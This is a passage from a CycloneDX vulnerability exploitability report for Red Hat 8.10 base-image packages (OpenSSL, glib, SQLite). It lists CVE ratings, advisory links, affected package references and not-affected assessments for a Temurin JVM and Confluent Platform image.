          "ref": "urn:cdx:248b0aee-6483-4d91-bbf1-fadc14596733/1#pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:3ac64bcb-7b78-45af-a3e0-c0426ccda759/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:3ac64bcb-7b78-45af-a3e0-c0426ccda759/1#pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:b8e83e7f-3162-469d-9f55-51bdc04e0a46/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:b8e83e7f-3162-469d-9f55-51bdc04e0a46/1#pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:d41f553c-295c-4111-b7e7-f45887522241/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:d41f553c-295c-4111-b7e7-f45887522241/1#pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:5e559e13-3588-4b39-a795-8f22d918f9cc/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:5e559e13-3588-4b39-a795-8f22d918f9cc/1#pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:e484a20e-ace3-4670-b007-26b75c05e02d/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:e484a20e-ace3-4670-b007-26b75c05e02d/1#pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:ea0043d5-aa37-4a91-b2c2-370f23a804ed/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:f1eabc1a-d3bc-4861-b423-18599026a397/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:f1eabc1a-d3bc-4861-b423-18599026a397/1#pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:b6af335d-5636-4a13-8101-c8f2514e3585/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:b6af335d-5636-4a13-8101-c8f2514e3585/1#pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:a5753d79-53e3-4330-a1d0-b369e13564fa/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:a5753d79-53e3-4330-a1d0-b369e13564fa/1#pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:ead82436-9087-4cdb-b83c-fea6029fb2a1/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:ead82436-9087-4cdb-b83c-fea6029fb2a1/1#pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:094ce4b1-86e3-48a8-85a3-08bf487e74de/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:094ce4b1-86e3-48a8-85a3-08bf487e74de/1#pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:7f4d6e0c-c98c-45a9-b9fd-d17744d62907/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:7f4d6e0c-c98c-45a9-b9fd-d17744d62907/1#pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:be61c518-d923-4fab-b79f-208cd636171a/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:be61c518-d923-4fab-b79f-208cd636171a/1#pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "",
        "response": [
          "update"
        ],
        "detail": "Exploitability analysis, additional details:\nTemurin JVM binary is linked only against glibc:\n$ ldd /usr/lib/jvm/temurin-17-jre/bin/java\n        linux-vdso.so.1 (0x0000ffff8cd00000)\n        libjli.so => /usr/lib/jvm/temurin-17-jre/bin/../lib/libjli.so (0x0000ffff8cc70000)\n        libpthread.so.0 => /lib64/libpthread.so.0 (0x0000ffff8cc3b000)\n        libdl.so.2 => /lib64/libdl.so.2 (0x0000ffff8cc1a000)\n        libc.so.6 => /lib64/libc.so.6 (0x0000ffff8caa4000)\n        /lib/ld-linux-aarch64.so.1 (0x0000ffff8ccc2000)"
      }
    },
    {
      "id": "CVE-2025-69421",
      "ratings": [
        {
          "source": {
            "name": "alma"
          },
          "severity": "high"
        },
        {
          "source": {
            "name": "amazon"
          },
          "severity": "high"
        },
        {
          "source": {
            "name": "azure"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "cbl-mariner"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "julia"
          },
          "score": 7.5,
          "severity": "high",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H"
        },
        {
          "source": {
            "name": "nvd"
          },
          "score": 7.5,
          "severity": "high",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H"
        },
        {
          "source": {
            "name": "oracle-oval"
          },
          "severity": "high"
        },
        {
          "source": {
            "name": "photon"
          },
          "severity": "high"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 6.5,
          "severity": "low",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H"
        },
        {
          "source": {
            "name": "rocky"
          },
          "severity": "high"
        },
        {
          "source": {
            "name": "ubuntu"
          },
          "severity": "low"
        }
      ],
      "cwes": [
        476
      ],
      "description": "Issue summary: Processing a malformed PKCS#12 file can trigger a NULL pointer\ndereference in the PKCS12_item_decrypt_d2i_ex() function.\n\nImpact summary: A NULL pointer dereference can trigger a crash which leads to\nDenial of Service for an application processing PKCS#12 files.\n\nThe PKCS12_item_decrypt_d2i_ex() function does not check whether the oct\nparameter is NULL before dereferencing it. When called from\nPKCS12_unpack_p7encdata() with a malformed PKCS#12 file, this parameter can\nbe NULL, causing a crash. The vulnerability is limited to Denial of Service\nand cannot be escalated to achieve code execution or memory disclosure.\n\nExploiting this issue requires an attacker to provide a malformed PKCS#12 file\nto an application that processes it. For that reason the issue was assessed as\nLow severity according to our Security Policy.\n\nThe FIPS modules in 3.6, 3.5, 3.4, 3.3 and 3.0 are not affected by this issue,\nas the PKCS#12 implementation is outside the OpenSSL FIPS module boundary.\n\nOpenSSL 3.6, 3.5, 3.4, 3.3, 3.0, 1.1.1 and 1.0.2 are vulnerable to this issue.",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2025-69421"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:1473"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2025-69421"
        },
        {
          "url": "https://bugzilla.redhat.com/2430375"
        },
        {
          "url": "https://bugzilla.redhat.com/2430376"
        },
        {
          "url": "https://bugzilla.redhat.com/2430377"
        },
        {
          "url": "https://bugzilla.redhat.com/2430378"
        },
        {
          "url": "https://bugzilla.redhat.com/2430379"
        },
        {
          "url": "https://bugzilla.redhat.com/2430380"
        },
        {
          "url": "https://bugzilla.redhat.com/2430381"
        },
        {
          "url": "https://bugzilla.redhat.com/2430386"
        },
        {
          "url": "https://bugzilla.redhat.com/2430387"
        },
        {
          "url": "https://bugzilla.redhat.com/2430388"
        },
        {
          "url": "https://bugzilla.redhat.com/2430389"
        },
        {
          "url": "https://bugzilla.redhat.com/2430390"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2430375"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2430376"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2430377"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2430378"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2430379"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2430380"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2430381"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2430386"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2430387"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2430388"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2430389"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2430390"
        },
        {
          "url": "https://cert-portal.siemens.com/productcert/html/ssa-265688.html"
        },
        {
          "url": "https://creativecommons.org/licenses/by/4.0/"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-11187"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-15467"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-15468"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-15469"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-66199"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-68160"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-69418"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-69419"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-69420"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-69421"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-22795"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-22796"
        },
        {
          "url": "https://errata.almalinux.org/9/ALSA-2026-1473.html"
        },
        {
          "url": "https://errata.rockylinux.org/RLSA-2026:1473"
        },
        {
          "url": "https://github.com/advisories/GHSA-w9rv-xc8m-cmqp"
        },
        {
          "url": "https://github.com/openssl/openssl/commit/3524a29271f8191b8fd8a5257eb05173982a097b"
        },
        {
          "url": "https://github.com/openssl/openssl/commit/36ecb4960872a4ce04bf6f1e1f4e78d75ec0c0c7"
        },
        {
          "url": "https://github.com/openssl/openssl/commit/4bbc8d41a72c842ce4077a8a3eccd1109aaf74bd"
        },
        {
          "url": "https://github.com/openssl/openssl/commit/643986985cd1c21221f941129d76fe0c2785aeb3"
        },
        {
          "url": "https://github.com/openssl/openssl/commit/a2dbc539f0f9cc63832709fa5aa33ad9495eb19c"
        },
        {
          "url": "https://linux.oracle.com/cve/CVE-2025-69421.html"
        },
        {
          "url": "https://linux.oracle.com/errata/ELSA-2026-50081.html"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-69421"
        },
        {
          "url": "https://openssl-library.org/news/secadv/20260127.txt"
        },
        {
          "url": "https://ubuntu.com/security/notices/USN-7980-1"
        },
        {
          "url": "https://ubuntu.com/security/notices/USN-7980-2"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2025-69421"
        }
      ],
      "published": "2026-01-27T16:16:34+00:00",
      "updated": "2026-06-17T10:00:40+00:00",
      "affects": [
        {
          "ref": "pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1",
          "versions": [
            {
              "version": "1:1.1.1k-17.el8_6",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1",
          "versions": [
            {
              "version": "1:1.1.1k-17.el8_6",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:77be1b45-0032-4592-b64e-28a2a6209e85/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:77be1b45-0032-4592-b64e-28a2a6209e85/1#pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:0ec03d22-f1f0-43ca-9881-db8ce7789cb8/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:0074a708-6d0c-4e92-bcee-de479d132a9e/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:0074a708-6d0c-4e92-bcee-de479d132a9e/1#pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:d9563237-0318-4775-9971-7f3e7fe82713/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:d9563237-0318-4775-9971-7f3e7fe82713/1#pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:5cd928b4-9283-4d18-8770-7ac5126adf5b/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:5cd928b4-9283-4d18-8770-7ac5126adf5b/1#pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:4df99559-f1e6-44b5-aea1-d8e1efe66bb4/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:4df99559-f1e6-44b5-aea1-d8e1efe66bb4/1#pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:2b188d42-64c9-42dc-aa70-8d6b7a0c05f3/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:2b188d42-64c9-42dc-aa70-8d6b7a0c05f3/1#pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:248b0aee-6483-4d91-bbf1-fadc14596733/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:248b0aee-6483-4d91-bbf1-fadc14596733/1#pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:3ac64bcb-7b78-45af-a3e0-c0426ccda759/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:3ac64bcb-7b78-45af-a3e0-c0426ccda759/1#pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:b8e83e7f-3162-469d-9f55-51bdc04e0a46/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:b8e83e7f-3162-469d-9f55-51bdc04e0a46/1#pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:d41f553c-295c-4111-b7e7-f45887522241/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:d41f553c-295c-4111-b7e7-f45887522241/1#pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:5e559e13-3588-4b39-a795-8f22d918f9cc/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:5e559e13-3588-4b39-a795-8f22d918f9cc/1#pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:e484a20e-ace3-4670-b007-26b75c05e02d/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:e484a20e-ace3-4670-b007-26b75c05e02d/1#pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:ea0043d5-aa37-4a91-b2c2-370f23a804ed/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:f1eabc1a-d3bc-4861-b423-18599026a397/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:f1eabc1a-d3bc-4861-b423-18599026a397/1#pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:b6af335d-5636-4a13-8101-c8f2514e3585/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:b6af335d-5636-4a13-8101-c8f2514e3585/1#pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:a5753d79-53e3-4330-a1d0-b369e13564fa/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:a5753d79-53e3-4330-a1d0-b369e13564fa/1#pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:ead82436-9087-4cdb-b83c-fea6029fb2a1/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:ead82436-9087-4cdb-b83c-fea6029fb2a1/1#pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:094ce4b1-86e3-48a8-85a3-08bf487e74de/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:094ce4b1-86e3-48a8-85a3-08bf487e74de/1#pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:7f4d6e0c-c98c-45a9-b9fd-d17744d62907/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:7f4d6e0c-c98c-45a9-b9fd-d17744d62907/1#pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:be61c518-d923-4fab-b79f-208cd636171a/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:be61c518-d923-4fab-b79f-208cd636171a/1#pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "",
        "response": [
          "update"
        ],
        "detail": "Exploitability analysis, additional details:\nTemurin JVM binary is linked only against glibc:\n$ ldd /usr/lib/jvm/temurin-17-jre/bin/java\n        linux-vdso.so.1 (0x0000ffff8cd00000)\n        libjli.so => /usr/lib/jvm/temurin-17-jre/bin/../lib/libjli.so (0x0000ffff8cc70000)\n        libpthread.so.0 => /lib64/libpthread.so.0 (0x0000ffff8cc3b000)\n        libdl.so.2 => /lib64/libdl.so.2 (0x0000ffff8cc1a000)\n        libc.so.6 => /lib64/libc.so.6 (0x0000ffff8caa4000)\n        /lib/ld-linux-aarch64.so.1 (0x0000ffff8ccc2000)"
      }
    },
    {
      "id": "CVE-2025-7039",
      "ratings": [
        {
          "source": {
            "name": "azure"
          },
          "severity": "low"
        },
        {
          "source": {
            "name": "cbl-mariner"
          },
          "severity": "low"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 3.7,
          "severity": "low",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:L/A:N"
        },
        {
          "source": {
            "name": "ubuntu"
          },
          "severity": "low"
        }
      ],
      "cwes": [
        22
      ],
      "description": "A flaw was found in glib. An integer overflow during temporary file creation leads to an out-of-bounds memory access, allowing an attacker to potentially perform path traversal or access private temporary file content by creating symbolic links. This vulnerability allows a local attacker to manipulate file paths and access unauthorized data. The core issue stems from insufficient validation of file path lengths during temporary file operations.",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2025-7039"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2025-7039"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2392423"
        },
        {
          "url": "https://cert-portal.siemens.com/productcert/html/ssa-253495.html"
        },
        {
          "url": "https://gitlab.gnome.org/GNOME/glib/-/issues/3716"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-7039"
        },
        {
          "url": "https://ubuntu.com/security/notices/USN-7942-1"
        },
        {
          "url": "https://ubuntu.com/security/notices/USN-7942-2"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2025-7039"
        }
      ],
      "published": "2025-09-03T02:15:38+00:00",
      "updated": "2026-06-17T10:04:08+00:00",
      "affects": [
        {
          "ref": "pkg:rpm/redhat/glib2@2.56.4-170.el8_10?arch=x86_64&distro=redhat-8.10",
          "versions": [
            {
              "version": "2.56.4-170.el8_10",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:77be1b45-0032-4592-b64e-28a2a6209e85/1#pkg:rpm/redhat/glib2@2.56.4-170.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0ec03d22-f1f0-43ca-9881-db8ce7789cb8/1#pkg:rpm/redhat/glib2@2.56.4-170.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0074a708-6d0c-4e92-bcee-de479d132a9e/1#pkg:rpm/redhat/glib2@2.56.4-170.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:d9563237-0318-4775-9971-7f3e7fe82713/1#pkg:rpm/redhat/glib2@2.56.4-170.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:5cd928b4-9283-4d18-8770-7ac5126adf5b/1#pkg:rpm/redhat/glib2@2.56.4-170.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:4df99559-f1e6-44b5-aea1-d8e1efe66bb4/1#pkg:rpm/redhat/glib2@2.56.4-170.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:2b188d42-64c9-42dc-aa70-8d6b7a0c05f3/1#pkg:rpm/redhat/glib2@2.56.4-170.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:248b0aee-6483-4d91-bbf1-fadc14596733/1#pkg:rpm/redhat/glib2@2.56.4-170.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:3ac64bcb-7b78-45af-a3e0-c0426ccda759/1#pkg:rpm/redhat/glib2@2.56.4-170.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:b8e83e7f-3162-469d-9f55-51bdc04e0a46/1#pkg:rpm/redhat/glib2@2.56.4-170.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:d41f553c-295c-4111-b7e7-f45887522241/1#pkg:rpm/redhat/glib2@2.56.4-170.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:5e559e13-3588-4b39-a795-8f22d918f9cc/1#pkg:rpm/redhat/glib2@2.56.4-170.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:e484a20e-ace3-4670-b007-26b75c05e02d/1#pkg:rpm/redhat/glib2@2.56.4-170.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:ea0043d5-aa37-4a91-b2c2-370f23a804ed/1#pkg:rpm/redhat/glib2@2.56.4-170.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:f1eabc1a-d3bc-4861-b423-18599026a397/1#pkg:rpm/redhat/glib2@2.56.4-170.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:b6af335d-5636-4a13-8101-c8f2514e3585/1#pkg:rpm/redhat/glib2@2.56.4-170.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:a5753d79-53e3-4330-a1d0-b369e13564fa/1#pkg:rpm/redhat/glib2@2.56.4-170.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:ead82436-9087-4cdb-b83c-fea6029fb2a1/1#pkg:rpm/redhat/glib2@2.56.4-170.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:094ce4b1-86e3-48a8-85a3-08bf487e74de/1#pkg:rpm/redhat/glib2@2.56.4-170.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:7f4d6e0c-c98c-45a9-b9fd-d17744d62907/1#pkg:rpm/redhat/glib2@2.56.4-170.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:be61c518-d923-4fab-b79f-208cd636171a/1#pkg:rpm/redhat/glib2@2.56.4-170.el8_10?arch=x86_64&distro=redhat-8.10"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "code_not_reachable",
        "response": [
          "update"
        ],
        "detail": "This issue is not exploitable in the Confluent Platform. This issue will be addressed in an upcoming quarterly patch release if an updated package is available from the vendor. The affected component is an operating-system base-image package that the product's application code does not use, so the vulnerable code path is not reachable."
      }
    },
    {
      "id": "CVE-2025-70873",
      "ratings": [
        {
          "source": {
            "name": "azure"
          },
          "severity": "high"
        },
        {
          "source": {
            "name": "bitnami"
          },
          "score": 7.5,
          "severity": "high",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N"
        },
        {
          "source": {
            "name": "photon"
          },
          "severity": "high"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 3.3,
          "severity": "low",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:L/I:N/A:N"
        }
      ],
      "cwes": [
        244
      ],
      "description": "An information disclosure issue in the zipfileInflate function in the zipfile extension in SQLite v3.51.1 and earlier allows attackers to obtain heap memory via supplying a crafted ZIP file.",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2025-70873"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2025-70873"
        },
        {
